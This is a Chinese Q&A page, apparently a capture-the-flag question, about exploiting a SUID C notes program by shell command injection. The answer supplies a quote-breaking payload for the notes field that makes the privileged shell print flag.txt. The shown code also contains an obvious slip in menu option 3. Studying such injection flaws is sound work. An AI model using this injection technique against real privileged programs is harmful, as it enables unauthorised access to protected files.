如何解决如何使用Shell命令注入文件
我有以下SUID C程序。
int execute(char *command,char *envp[])
{
pid_t pid;
int status=0;
char *argv[] = {"/bin/bash","-p","-c",command,NULL};
if ((pid = fork()) < 0) { /* fork a child process */
printf("*** ERROR: forking child process Failed\n");
exit(1);
}
else if (pid == 0) { /* for the child process: */
if (execvpe(*argv,argv,envp) < 0) { /* execute the command */
printf("*** ERROR: exec Failed\n");
exit(1);
}
}
else { /* for the parent: */
while (wait(&status) != pid) /* wait for completion */
;
}
return status;
}
int main(int argc,char * argv[],char *envp[])
{
char command[256];
char name[64];
char menu[10];
char notes[128];
char filename[128] = PREFIX;
strcat(filename,"mynotes.txt");
printf("What's your name? ");
fgets(name,64,stdin);
strtok(name,"\n");
printf("Welcome %s!\n",name);
do {
printf("\nWhat would you like to do? \n");
printf("[1] Check the weather\n");
printf("[2] Write a note\n");
printf("[3] Read my notes\n");
printf("[4] Get the flag\n");
printf("[5] Quit\n");
printf("Enter your choise (1-5): ");
fgets(menu,10,stdin);
switch(menu[0]) {
case '1':
strcpy(command,"/usr/bin/curl wttr.in/?format=4");
execute(command,envp);
break;
case '2':
printf("Please type in your notes (128 characters max.):\n");
fgets(notes,128,stdin);
sprintf(command,"/bin/echo '%s' >> %s",notes,filename);
execute(command,envp);
break;
case '3':
sprintf(command,"/bin/cat %s",envp);
break;
case '4':
printf("I'm sorry %s,I'm afraid I can't do that.\n",name);
break;
}
}
while(menu[0] != '5');
return 0;
}
如何通过shell命令注入来利用它来显示同一用户拥有的另一个文件的内容。 例如,我尝试过./shellwrapper; cat flag.txt,但是由于./shellwrapper完成并且suid不再有效,因此权限被拒绝。菜单选择中是否存在漏洞?
解决方法
选择选项2,然后输入以下注释:
';cat flag.txt;echo '
之所以有效,是因为它不会转义音符输入,所以当您替换音符时,您会得到
/bin/echo '';cat flag.txt;echo '' >> mynotes.txt
这将由SUID shell执行。它将输出flag.txt
到终端,并将空行写入mynotes.txt
。
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。